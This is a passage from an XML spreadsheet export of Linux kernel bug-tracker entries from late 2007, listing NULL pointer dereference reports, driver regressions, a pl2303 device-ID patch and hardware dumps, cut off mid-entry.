    <t>There is a NULL pointer dereference on drivers/usb/serial/mos7720.c The error can be tracked down as follows: (1) line 568: there's a test "if (serial-&gt;dev)" implying that null is a legal value for "serial-&gt;dev" at that point (2) line 576: "serial" is passed in as an argument to "send_mos_cmd" (3) line 282: "send_mos_cmd" unconditionally dereferences serial-&gt;dev at expression "le16_to_cpu(serial-&gt;dev-&gt;descriptor.idProduct)</t>
  </si>
  <si>
    <t>NULL pointer dereference on drivers/usb/serial/whiteheat.c</t>
  </si>
  <si>
    <t>2007-12-15 07:08 UTC</t>
  </si>
  <si>
    <t>2008-09-22 10:44 UTC</t>
  </si>
  <si>
    <t>There's a null pointer dereference on drivers/usb/serial/whiteheat.c as follows: (1) line 613: the test "if (port-&gt;tty)" implies that null is a legal value for "port-&gt;tty" at that point (2) neither firm_open nor firm_purge initialize "port-&gt;tty" (3) line 630: "port-&gt;tty" is dereferenced at statement old_term.c_cflag = ~port-&gt;tty-&gt;termios-&gt;c_cflag;</t>
  </si>
  <si>
    <t>NULL pointer dereference on kernel/auditsc.c</t>
  </si>
  <si>
    <t>2007-12-15 13:11 UTC</t>
  </si>
  <si>
    <t>2008-09-20 23:54 UTC</t>
  </si>
  <si>
    <t>Dereferencing a null pointer on kernel/auditsc.c at line 461</t>
  </si>
  <si>
    <t>2007-12-15 13:29 UTC</t>
  </si>
  <si>
    <t>2008-09-21 00:01 UTC</t>
  </si>
  <si>
    <t>There's a null pointer dereference on kernel/auditsc.c as follows: (1) go around the loop that starts at line 281 once, follow a path till you get to line 434. This line tests for "if (ctx)", which implies that null is a legal value for that variable. (2) go around the loop again, this time selecting the "case AUDIT_PERM" at line 460. (3) then the function call on line 461 passes a null pointer, "ctx," into procedure "audit_match_perm." However this procedure dereferences "ctx" unconditionally at its very first statement "unsigned n = ctx-&gt;major".</t>
  </si>
  <si>
    <t>Dereferencing NULL pointer on kernel/irq/manage.c</t>
  </si>
  <si>
    <t>2007-12-15 16:56 UTC</t>
  </si>
  <si>
    <t>2008-09-04 10:33 UTC</t>
  </si>
  <si>
    <t>There's a potential null pointer dereference on kernel/irq/manage.c. The error can be tracked down as follows: (1) assume the "if" statement at line 334 is true (2) let the first conjunct "desc-&gt;chip" on the "if" statement at line 335 be false, which means "desc-&gt;chip" points-to null and also signifies that the "if" statement evaluates to false. (3) the else statement starting at line 338 executes, which means "printk" prints "unknown" as its last word (4) let the "if" statement on line 353 be true (5) now "desc-&gt;chip" is dereferenced at line 356 although it is null.</t>
  </si>
  <si>
    <t>Dereferencing NULL pointer on drivers/i2c/busses/i2c-omap.c</t>
  </si>
  <si>
    <t>2007-12-15 17:11 UTC</t>
  </si>
  <si>
    <t>2007-12-16 10:38 UTC</t>
  </si>
  <si>
    <t>Tony Lindgren</t>
  </si>
  <si>
    <t>There's a null pointer dereference on drivers/i2c/busses/i2c-omap.c, line 628. (because the called function, "omap_i2c_write_reg" cannot handle a null value on its first parameter). The error only happens if "kzalloc" at line 566 cannot allocate enough memory, so I guess this is a low severity bug. The error can be tracked down as follows: (1) line 566: kzalloc fails to allocate memory (2) line 567: "dev" is null, making the procedure to jump to line 627. (3) line 628: a null value is passed in as the first argument to "omap_i2c_write_reg," which cannot handle such value because it dereferences its parameter "i2c_dev" unconditionally (line 136 of the same file).</t>
  </si>
  <si>
    <t>rt2x00: no wakeup from S3</t>
  </si>
  <si>
    <t>2.6.24-rc5 (and previous rcs)</t>
  </si>
  <si>
    <t>2007-12-16 12:02 UTC</t>
  </si>
  <si>
    <t>Jan Willies</t>
  </si>
  <si>
    <t>2008-04-02 10:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23.9 Distribution: archlinux Hardware Environment: Medion MD 96400 (aka MSI S270) Software Environment: latest archlinux Problem Description: - no battery information beneath /sys - wakeup from S3 doesn't work anymore (LEDs just blink) Steps to reproduce: [ ] Deprecated /proc/acpi files [ ] Deprecated power /proc/acpi folders [ ] Deprecated /proc/acpi/event support and boot 2.6.24-rcX .config, acpidump, dmesg output attached (all from 2.6.24-rc5-git3) This was the old output: jan@jan ~ $ cat /proc/acpi/battery/BAT1/* alarm: unsupported present: yes design capacity: 4400 mAh last full capacity: 2976 mAh battery technology: rechargeable design voltage: 14800 mV design capacity warning: 0 mAh design capacity low: 0 mAh capacity granularity 1: 1 mAh capacity granularity 2: 1 mAh model number: MS-1013 serial number: battery type: LION OEM info: present: yes capacity state: ok charging state: charged present rate: 0 mA remaining capacity: 2976 mAh present voltage: 16681 mV</t>
  </si>
  <si>
    <t>pata_it821x does not load and recognise volumes</t>
  </si>
  <si>
    <t>2.6.23.11</t>
  </si>
  <si>
    <t>2007-12-17 04:20 UTC</t>
  </si>
  <si>
    <t>2008-02-22 05:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: - Distribution: Debian Sid Hardware Environment:Amd 3200+, Gigabyte GA-K8NSNXP, with ite 8212 raid chip Software Environment:kernel Problem Description:The module loads, but it does not recognise or initiate the volumes on the drives attached to the raid controller. Steps to reproduce: Attach a RAID (0 or 1) to the ite controller, and boot with a newer kernel (2.6.20 or higher). No drives will be found. However: it does work in non-raid mode; booting with "pata_it821x noraid=1" will show both drives separately.</t>
  </si>
  <si>
    <t>lack of /proc/net/ax25 with 2.6.24-rc5</t>
  </si>
  <si>
    <t>2007-12-17 13:34 UTC</t>
  </si>
  <si>
    <t>2007-12-20 16:13 UTC</t>
  </si>
  <si>
    <t>Subject : lack of /proc/net/ax25 with 2.6.24-rc5 Submitter : Bernard Pidoux &lt;pidoux@ccr.jussieu.fr&gt; References : http://lkml.org/lkml/2007/12/16/131</t>
  </si>
  <si>
    <t>CMD646 &amp; cdrom: drive appears confused &amp; drive not ready for command</t>
  </si>
  <si>
    <t>2.6.24-rc5-gda8cadb3</t>
  </si>
  <si>
    <t>2007-12-17 13:44 UTC</t>
  </si>
  <si>
    <t>2008-01-02 14:21 UTC</t>
  </si>
  <si>
    <t>Subject : CMD646 &amp; cdrom: drive appears confused &amp; drive not ready for command Submitter : Meelis Roos &lt;mroos@linux.ee&gt; References : http://lkml.org/lkml/2007/12/16/99 Handled-By : Andrew Morton &lt;akpm@linux-foundation.org&gt;</t>
  </si>
  <si>
    <t>2.6.24-rc5: tape drive not responding</t>
  </si>
  <si>
    <t>2007-12-17 13:56 UTC</t>
  </si>
  <si>
    <t>2007-12-20 16:15 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc5: tape drive not responding Submitter : "John Stoffel" &lt;john@stoffel.org&gt; References : http://lkml.org/lkml/2007/12/16/199 Handled-By : FUJITA Tomonori &lt;fujita.tomonori@lab.ntt.co.jp&gt; Patch : http://marc.info/?l=linux-scsi&amp;m=119770154127770&amp;w=2</t>
  </si>
  <si>
    <t>Another potential NULL ptr dereference, drivers/usb/gadget/fsl_usb2_udc.c</t>
  </si>
  <si>
    <t>2007-12-17 22:22 UTC</t>
  </si>
  <si>
    <t>2008-09-22 10:39 UTC</t>
  </si>
  <si>
    <t>The following code fragment occurs at line 773: if (!_ep || (!ep-&gt;desc &amp;&amp; ep_index(ep))) { VDBG("%s, bad ep\n", __FUNCTION__); return -EINVAL; } Shouldn't the first conjunct of "&amp;&amp;" test be "ep-&gt;desc" ? if (!_ep || (ep-&gt;desc &amp;&amp; ep_index(ep))) { VDBG("%s, bad ep\n", __FUNCTION__); return -EINVAL; }</t>
  </si>
  <si>
    <t>xfs mknod regression</t>
  </si>
  <si>
    <t>2007-12-19 15:42 UTC</t>
  </si>
  <si>
    <t>2008-01-01 12:33 UTC</t>
  </si>
  <si>
    <t>Subject : xfs mknod regression Submitter : "Bret Towe" &lt;magnade@gmail.com&gt; References : http://lkml.org/lkml/2007/12/17/526 Handled-By : Christoph Hellwig &lt;hch@infradead.org&gt; Patch : http://lkml.org/lkml/2007/12/18/20</t>
  </si>
  <si>
    <t>Linux 2.6.24-rc5 x86 architecture no longer Oopses...</t>
  </si>
  <si>
    <t>2007-12-20 16:32 UTC</t>
  </si>
  <si>
    <t>2007-12-21 04:24 UTC</t>
  </si>
  <si>
    <t>Subject : Linux 2.6.24-rc5 x86 architecture no longer Oopses... Submitter : Trond Myklebust &lt;trond.myklebust@fys.uio.no&gt; References : http://lkml.org/lkml/2007/12/20/552 Handled-By : Andrew Morton &lt;akpm@linux-foundation.org&gt; Ingo Molnar &lt;mingo@elte.hu&gt; Patch : http://lkml.org/lkml/2007/12/20/558</t>
  </si>
  <si>
    <t>Hang during boot with NO_HZ</t>
  </si>
  <si>
    <t>2007-12-20 19:45 UTC</t>
  </si>
  <si>
    <t>Nathan Myers</t>
  </si>
  <si>
    <t>2009-01-13 00:54 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: (pre-NO_HZ) Distribution: Debian Hardware Environment: Dell Latitude D620 Intel Core2 Duo T7200 2GHz Nvidia Quadro NVS 110M / GeForce Go 7300 (rev a1) Software Environment: Boot from sata, no initramfs, no binary modules Kernel built with gcc-4.2. Normally I patch in tuxonice, although that doesn't seem to affect the sequence of boot messages. Problem Description: During boot, messages . ... nvidiafb: CRTC1 analog not found i2c-adapter i2c-0: unable to read EDID block i2c-adapter i2c-0: unable to read EDID block i2c-adapter i2c-0: unable to read EDID block i2c-adapter i2c-1: unable to read EDID block i2c-adapter i2c-1: unable to read EDID block i2c-adapter i2c-1: unable to read EDID block Switched to high resolution mode on CPU 1 Switched to high resolution mode on CPU 0 . and then it hangs, with no response to keyboard actions. Adding nohz=off to the boot line allows boot to continue, leading to . IP route cache hash table entries 32768 (order: 5, 131072 bytes) . after the point where it had frozen. Steps to reproduce: Just boot. (Behavior was the same in 2.6.22.9 at that time, although not often previously.) (Is there any point in using acpi_irq_balance any more?) However, I have been unable to reproduce this failure today despite unchanged hardware and unchanged kernel images. (I.e., the failure is intermittent, on a fairly long time scale.) When I boot from power-off today, the order of messages produced is very different. In particular, the "i2c-adapter" EDID messages come long after the switch to high resolution mode on each CPU. I don't know why switching to high resolution mode is delayed so long in the failed boot.</t>
  </si>
  <si>
    <t>Julian Sikorski</t>
  </si>
  <si>
    <t>Bug with cpufreq when using ondemand governor as default</t>
  </si>
  <si>
    <t>2007-12-21 14:06 UTC</t>
  </si>
  <si>
    <t>2008-09-24 04:09 UTC</t>
  </si>
  <si>
    <t>Subject : Bug with cpufreq when using ondemand governor as default Submitter : Johannes Weiner &lt;hannes@saeurebad.de&gt; References : http://lkml.org/lkml/2007/12/21/127 Handled-By : Patch : http://lkml.org/lkml/2007/12/21/127</t>
  </si>
  <si>
    <t>panic in :firewire_ohci:handle_at_packet  (was oops with macbook in target disk mode (firewire-ohci))</t>
  </si>
  <si>
    <t>2.6.24-rc5-g2d0811f5-dirty</t>
  </si>
  <si>
    <t>2007-12-21 16:03 UTC</t>
  </si>
  <si>
    <t>2008-03-22 12:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: debian/unstable(+experimental) Hardware Environment: powerbook G4 Software Environment: gnome? kernel version is wireless-2.6#everything tree plus some local wireless patches Problem Description: System oopses as soon as I plug in a macbook in target-disk mode (with firewire-ohci). Steps to reproduce: unload ohci1394, load firewire-ohci plug in cable connected to macbook in target-disk mode Unlike with ohci1394, it oopses without mounting anything.</t>
  </si>
  <si>
    <t>list corruption on ib_srp load in v2.6.24-rc5</t>
  </si>
  <si>
    <t>2007-12-22 04:42 UTC</t>
  </si>
  <si>
    <t>2008-01-03 13:12 UTC</t>
  </si>
  <si>
    <t>Subject : list corruption on ib_srp load in v2.6.24-rc5 Submitter : David Dillow &lt;dillowda@ornl.gov&gt; References : http://lkml.org/lkml/2007/12/21/229 Handled-By : Roland Dreier &lt;rdreier@cisco.com&gt;</t>
  </si>
  <si>
    <t>Problems on booting</t>
  </si>
  <si>
    <t>2.6.24-rc5-git7</t>
  </si>
  <si>
    <t>2007-12-22 14:29 UTC</t>
  </si>
  <si>
    <t>2009-03-23 09:15 UTC</t>
  </si>
  <si>
    <t>Subject : Problems on booting Submitter : "werner" &lt;werner@copaya.yi.org&gt; References : http://lkml.org/lkml/2007/12/22/110</t>
  </si>
  <si>
    <t>drivers/usb/serial/pl2303: does not support 4348:5523</t>
  </si>
  <si>
    <t>2.6.24-rc6-git1</t>
  </si>
  <si>
    <t>2007-12-23 12:55 UTC</t>
  </si>
  <si>
    <t>Piotr Roszatycki</t>
  </si>
  <si>
    <t>2008-02-05 00:54 UTC</t>
  </si>
  <si>
    <t>The pl2023 does not support the following device: 4348:5523 WinChipHead USB-&gt;RS 232 adapter with Prolifec PL 2303 chipset This driver is working with following patch (http://trash.uid0.hu/stuff/pl2303_hl340.diff): diff -ruN linux-2.6.22.1.orig/drivers/usb/serial/pl2303.c linux-2.6.22.1/drivers/usb/serial/pl2303.c --- linux-2.6.22.1.orig/drivers/usb/serial/pl2303.c 2007-08-09 14:30:33.610595000 +0200 +++ linux-2.6.22.1/drivers/usb/serial/pl2303.c 2007-08-09 14:36:39.594595000 +0200 @@ -84,6 +84,7 @@ { USB_DEVICE(ALCOR_VENDOR_ID, ALCOR_PRODUCT_ID) }, { USB_DEVICE(HUAWEI_VENDOR_ID, HUAWEI_PRODUCT_ID) }, { USB_DEVICE(WS002IN_VENDOR_ID, WS002IN_PRODUCT_ID) }, + { USB_DEVICE(HL340_VENDOR_ID, HL340_PRODUCT_ID) }, { } /* Terminating entry */ }; diff -ruN linux-2.6.22.1.orig/drivers/usb/serial/pl2303.h linux-2.6.22.1/drivers/usb/serial/pl2303.h --- linux-2.6.22.1.orig/drivers/usb/serial/pl2303.h 2007-08-09 14:30:33.610595000 +0200 +++ linux-2.6.22.1/drivers/usb/serial/pl2303.h 2007-08-09 14:37:11.638595000 +0200 @@ -102,3 +102,7 @@ #define WS002IN_VENDOR_ID 0x11f6 #define WS002IN_PRODUCT_ID 0x2001 +/* HL HL-340 (ID: 4348:5523) */ +#define HL340_VENDOR_ID 0x4348 +#define HL340_PRODUCT_ID 0x5523 +</t>
  </si>
  <si>
    <t>Regression: Battery method parse error</t>
  </si>
  <si>
    <t>2.6.24-rc6</t>
  </si>
  <si>
    <t>2007-12-23 13:00 UTC</t>
  </si>
  <si>
    <t>2008-10-29 15:36 UTC</t>
  </si>
  <si>
    <t>9663 9697 9730</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.24-rc2 Distribution: Debian unstable Hardware Environment: ULI Laptop Hi all, I noticed that my battery meter stopped working somewhere in the 2.6.24-rc series, so I did a bisect and found this: commit 5870a8cd23181703cc76f88f630372f8602c7648 Author: Alexey Starikovskiy &lt;astarikovskiy@suse.de&gt; Date: Thu Nov 15 21:52:47 2007 +0300 ACPI: EC: Don't init EC early if it has no _INI Option to init EC early inserted to handle #8598 ASUS problem, introduced several others. EC driver in this particular case has fake _INI method, not present on other machines, which don't need or break from this workaround, so lets use its presence as a flag for early init. http://bugzilla.kernel.org/show_bug.cgi?id=9262 http://bugzilla.kernel.org/show_bug.cgi?id=8598 https://bugzilla.novell.com/show_bug.cgi?id=334806 Signed-off-by: Alexey Starikovskiy &lt;astarikovskiy@suse.de&gt; Signed-off-by: Len Brown &lt;len.brown@intel.com&gt; Reverting this patch does indeed fix the problem with 2.6.24-rc6. I'll attach dmesg with and without patch, along with an acpidump. Regards, Bruce</t>
  </si>
  <si>
    <t>Zdenek Kabelac</t>
  </si>
  <si>
    <t>PNP revert create dma performance degradation</t>
  </si>
  <si>
    <t>2.6.23.12</t>
  </si>
  <si>
    <t>2007-12-24 14:19 UTC</t>
  </si>
  <si>
    <t>Alessandro Vietta</t>
  </si>
  <si>
    <t>2008-01-15 15:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.23.11 Distribution: Debian Sid Hardware Environment: i686 Software Environment: 32 bit Problem Description: hard-disk read-write is 15%-20% slower than 2.6.23.11. I adviced the same problem perhaps a year and a half ago, but i cannot remember the kernel version. After some time the problem disappeared, perhaps the 2.6.23.12 PNP reverted patch was included into the kernel. Someone opened a similar bug when it happened for the first time, but i can't find it again. He owned a Vaio too, i think it was very similar to mine, a VGN-FS (same chipset). Steps to reproduce: my notebook VAIO VGN-FS295XP: 00:00.0 Host bridge: Intel Corporation Mobile 915GM/PM/GMS/910GML Express Processor to DRAM Controller (rev 03) Subsystem: Sony Corporation Unknown device 81b7 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [e0] Vendor Specific Information 00:01.0 PCI bridge: Intel Corporation Mobile 915GM/PM Express PCI Express Root Port (rev 03) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: 90000000-afffffff Prefetchable memory behind bridge: c0000000-cfffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [88] Subsystem: Sony Corporation Unknown device 81b7 Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [90] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Address: 00000000 Data: 0000 Capabilities: [a0] Express Root Port (Slot+) IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag- Device: Latency L0s &lt;64ns, L1 &lt;1us Device: Errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ Device: RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- Device: MaxPayload 128 bytes, MaxReadReq 128 bytes Link: Supported Speed 2.5Gb/s, Width x16, ASPM L0s L1, Port 2 Link: Latency L0s &lt;256ns, L1 &lt;4us Link: ASPM Disabled RCB 64 bytes CommClk+ ExtSynch- Link: Speed 2.5Gb/s, Width x16 Slot: AtnBtn- PwrCtrl- MRL- AtnInd- PwrInd- HotPlug- Surpise- Slot: Number 1, PowerLimit 75.000000 Slot: Enabled AtnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- Slot: AttnInd Off, PwrInd On, Power- Root: Correctable- Non-Fatal- Fatal- PME- Capabilities: [100] Virtual Channel Capabilities: [140] Unknown (5) 00:1b.0 Audio device: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) High Definition Audio Controller (rev 03) Subsystem: Sony Corporation Unknown device 81bb Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 10 Region 0: Memory at 80000000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [60] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [70] Express Unknown type IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag- Device: Latency L0s &lt;64ns, L1 &lt;1us Device: Errors: Correctable- Non-Fatal- Fatal- Unsupported- Device: RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop+ Device: MaxPayload 128 bytes, MaxReadReq 128 bytes Link: Supported Speed unknown, Width x0, ASPM unknown, Port 0 Link: Latency L0s &lt;64ns, L1 &lt;1us Link: ASPM Disabled CommClk- ExtSynch- Link: Speed unknown, Width x0 Capabilities: [100] Virtual Channel Capabilities: [130] Unknown (5) 00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 03) (prog-if 00 [UHCI]) Subsystem: Sony Corporation Unknown device 81b9 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 5 Region 4: I/O ports at 1800 [size=32] 00:1d.1 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #2 (rev 03) (prog-if 00 [UHCI]) Subsystem: Sony Corporation Unknown device 81b9 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 11 Region 4: I/O ports at 1820 [size=32] 00:1d.2 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #3 (rev 03) (prog-if 00 [UHCI]) Subsystem: Sony Corporation Unknown device 81b9 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin C routed to IRQ 3 Region 4: I/O ports at 1840 [size=32] 00:1d.3 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #4 (rev 03) (prog-if 00 [UHCI]) Subsystem: Sony Corporation Unknown device 81b9 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin D routed to IRQ 10 Region 4: I/O ports at 1860 [size=32] 00:1d.7 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB2 EHCI Controller (rev 03) (prog-if 20 [EHCI]) Subsystem: Sony Corporation Unknown device 81b9 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 5 Region 0: Memory at 80004000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev d3) (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=06, subordinate=0a, sec-latency=32 I/O behind bridge: 00002000-00002fff Memory behind bridge: b0000000-b00fffff Prefetchable memory behind bridge: 0000000050000000-0000000053ffffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [50] Subsystem: Sony Corporation Unknown device 81b9 00:1f.0 ISA bridge: Intel Corporation 82801FBM (ICH6M) LPC Interface Bridge (rev 03) Subsystem: Sony Corporation Unknown device 81b9 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:1f.1 IDE interface: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) IDE Controller (rev 03) (prog-if 8a [Master SecP PriP]) Subsystem: Sony Corporation Unknown device 81b9 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 3 Region 0: I/O ports at 01f0 [size=8] Region 1: I/O ports at 03f4 [size=1] Region 2: I/O ports at 0170 [size=8] Region 3: I/O ports at 0374 [size=1] Region 4: I/O ports at 1880 [size=16] 00:1f.3 SMBus: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) SMBus Controller (rev 03) Subsystem: Sony Corporation Unknown device 81b9 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 10 Region 4: I/O ports at 18a0 [size=32] 01:00.0 VGA compatible controller: nVidia Corporation GeForce Go 6200 TurboCache (rev a1) (prog-if 00 [VGA]) Subsystem: Sony Corporation Unknown device 81c2 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 10 Region 0: Memory at a0000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at c0000000 (64-bit, prefetchable) [size=256M] Region 3: Memory at 90000000 (64-bit, non-prefetchable) [size=16M] [virtual] Expansion ROM at 91000000 [disabled] [size=128K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [68] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 Capabilities: [78] Express Endpoint IRQ 0 Device: Supported: MaxPayload 128 bytes, PhantFunc 0, ExtTag- Device: Latency L0s &lt;512ns, L1 &lt;4us Device: AtnBtn- AtnInd- PwrInd- Device: Errors: Correctable- Non-Fatal- Fatal- Unsupported- Device: RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ Device: MaxPayload 128 bytes, MaxReadReq 512 bytes Link: Supported Speed 2.5Gb/s, Width x16, ASPM L0s L1, Port 0 Link: Latency L0s &lt;256ns, L1 &lt;4us Link: ASPM Disabled RCB 128 bytes CommClk+ ExtSynch- Link: Speed 2.5Gb/s, Width x16 Capabilities: [100] Virtual Channel Capabilities: [128] Power Budgeting 06:03.0 CardBus bridge: Texas Instruments PCI7420 CardBus Controller Subsystem: Sony Corporation Unknown device 818f Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 168, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 10 Region 0: Memory at b0008000 (32-bit, non-prefetchable) [size=4K] Bus: primary=06, secondary=07, subordinate=0a, sec-latency=176 Memory window 0: 50000000-53fff000 (prefetchable) Memory window 1: 54000000-57fff000 I/O window 0: 00002400-000024ff I/O window 1: 00002800-000028ff BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset+ 16bInt+ PostWrite+ 16-bit legacy interface ports at 0001 06:03.2 FireWire (IEEE 1394): Texas Instruments PCI7x20 1394a-2000 OHCI Two-Port PHY/Link-Layer Controller (prog-if 10 [OHCI]) Subsystem: Sony Corporation Unknown device 818f Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (750ns min, 1000ns max), Cache Line Size: 64 bytes Interrupt: pin C routed to IRQ 3 Region 0: Memory at b0004000 (32-bit, non-prefetchable) [size=2K] Region 1: Memory at b0000000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- 